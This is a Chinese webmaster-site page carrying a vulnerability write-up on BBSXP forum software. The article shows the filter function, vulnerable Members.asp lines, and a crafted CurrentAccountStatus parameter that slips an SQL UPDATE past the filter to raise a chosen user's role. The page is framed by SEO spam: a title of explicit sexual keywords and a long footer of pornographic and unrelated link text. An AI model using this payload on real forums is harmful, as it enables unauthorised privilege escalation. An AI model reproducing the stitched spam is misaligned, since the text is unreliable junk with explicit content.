青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 漏洞分析 查看內(nèi)容

BBSXP繞過過濾繼續(xù)注入漏洞分析

2022-9-27 15:29| 查看: 2372 |來源: 互聯(lián)網(wǎng)

漏洞分析: 官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Replace(fString,CHR(13),"") fString=Replace(fStri
漏洞分析:
官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"
")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '過濾片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作為測試:
SearchType=HTMLEncode(Request("SearchType")) //第8行
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '獲取數(shù)據(jù)數(shù)量
//第54行

看個sql語句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
變量userid繞過過濾成功執(zhí)行了update
同理構(gòu)造:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
本文最后更新于 2022-9-27 15:29,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 亚洲 无码 在线 专区 | 99re6在线视频国产精品欧美 | 国产精品手机在线视频 | 好大快用力深一点h视频 | 久久精品国产99欧美精品亚洲 | 95国产精品人妻无码久 | 欧美不卡一区二区三区 | 诱人的女邻居9中文观看 | 久久视热频国只有精品 | 国产在线一区二区三区四区 | 久久精品中文騷妇女内射 | 国产在线观看成人免费视频 | 亚洲伊人久久精品 | 国产精品乱码色情一区二区视频 | YIN荡的老师系列第6部分视频 | 女人一级毛片免费视频观看 | 在线播放免费人成毛片视频 | 俄罗斯乌克兰战争原因 | 世界第一黄暴漫画家 | 国产三级在线免费 | 好湿好滑好硬好爽好深视频 | 男同志china免费视频 | 老湿机一区午夜精品免费福利 | 亚洲性夜夜夜色综合网 | 青青久久网| 亚洲AV无码国产精品色在线看 | 免费毛片播放 | 日本不卡一二三 | 九九热精品在线观看 | 久久精品国产欧美成人 | 粗大分开挺进内射 | 日本免费一区二区三区最新vr | 久久久大香菇 | 99国产在线观看 | 久久精品中文字幕有码日本 | 国产成人免费片在线观看 | 99riav9 精品香蕉免费大视频 | 亚洲在线国产日韩欧美 | 三级视频黄色 | 伦理片在线线手机版韩国免费观看 | 国产精品美女久久久久AV超清 |